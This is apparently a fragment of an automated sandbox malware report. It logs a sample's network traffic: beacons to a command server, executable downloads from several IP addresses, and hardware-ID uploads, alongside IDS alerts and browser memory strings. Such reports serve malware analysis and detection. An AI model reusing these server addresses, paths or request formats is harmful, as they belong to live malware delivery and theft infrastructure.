00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002596001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002597001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 43 38 44 46 42 44 37 45 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="hwid"C2C8DFBD7ECE2914648374------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="build"tale------CAAEBKEGHJKEBFHJDBFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002598001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 43 38 44 46 42 44 37 45 43 45 32 39 31 34 36 34 38 33 37 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 2d 2d 0d 0a Data Ascii: ------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="hwid"C2C8DFBD7ECE2914648374------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="build"tale------DGCBAFIJDGHCAKECAEGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002599001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/test.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 36 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002600001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49758 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58190 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58193 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58200 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:58204 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58207 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:58207 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:58221 -> 31.41.244.11:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_0042BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 17_2_0042BE30
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/test.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2953297308.000001DF202C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2959294479.000001DF20A74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2090E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["www.facebook.com","facebook.com"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["www.youtube.com","youtube.com"] equals www.youtube.com (Youtube)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2090E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
